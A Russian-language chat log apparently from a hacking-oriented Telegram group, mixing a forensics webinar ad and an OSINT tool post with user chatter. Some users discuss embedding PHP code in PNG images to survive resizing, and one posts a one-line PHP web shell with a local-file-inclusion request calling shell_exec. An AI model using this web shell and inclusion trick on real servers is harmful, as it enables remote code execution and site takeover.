это eternalblue, но эту дырку залатать должны были давно

#реклама

Как провести полноценное расследование кибератаки с ущербом в 80млн рублей?

25 ноября в 19:00 на бесплатном вебинаре «Компьютерная криминалистика
на страже безопасности компании. Case Study» вместе с экспертом по форензике мы проведем разбор инцидента несанкционированного списания платежей в компании на сумму 80 млн. рублей, рассмотрев сценарий преступления, факторы и итоги расследования.

Также вы узнаете:
— Что такое компьютерная криминалистика и какие задачи она решает?
— Необходимый технический стек для работы в этом направлении
— Инструменты обеспечения корпоративной безопасности бизнеса, и почему они так востребованы
— Почему форензика может быть интереснее, чем SOC или пентест?

Примите участие в вебинаре и узнайте больше о расследовании инцидентов, а также о карьере в компьютерной криминалистике🔥

Регистрируйтесь по ссылке прямо сейчас: https://is.gd/pw8vYr

благодарю

Вернулся да

Mnp4

Сложна

Тут кто то контакты админа спросил

кто в php разбирается?
Как с помощью imagecopyresized увеличить размер и получить увеличенную картинку?

Ты все еще пытаешься в картинку код запихнуть?

Обязательно с помощью пхп?

Ага, вот там https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/ Step 4. Bypassing image transforms, я правильно понимаю что он говорит о том что она неуязвима к изменению размеров с помощью imagecopyresized и imagecopyresampled?

Пацаны, а есть у кого ссылка на магазин codeby ?

​​Snoop Project инструмент разведки на основе открытых данных (OSINT world)

Snoop был разработан, потому что Sherlock; Spiderfoot; Namechk и WhatsMyName все эти инструменты ищут по основным и популярным зарубежным сайтам, а Snoop ко всему прочему не брезгует малочисленными или специфичными форумами, шерстит ещё и по СНГ локации. Может ли Snoop конкурировать с поисковиками Google или Yandex? Да, может. Поисковики сильны если сокращать 'мусорные результаты" с помощью дорков, но они ориентируются на robots.txt, в котором иногда прописано 'не отслеживать публичные данные пользователей'. Что еще ждать от ПО? Работаю над разработкой модулей: к некоторым популярным площадкам добавится анализ сообщений, типа такого.

Читать: https://codeby.net/threads/snoop-project-instrument-razvedki-na-osnove-otkrytyx-dannyx-osint-world.73858/

#osint #soft

У меня нет

Да не, там чувачок спам кинул. Поэтому тегнул тебя

А когда такой код в php
<?=$_GET[0]($_POST[1]);?>
Как я должен передавать параметр чтобы выполнить код php запросом?
...?page=../upload/xxx.png&0=shell_exec
А post куда вписать в тело? 1=phpinfo() ?

В тело

Только вот данные в запросе у тебя некорректны

А как надо?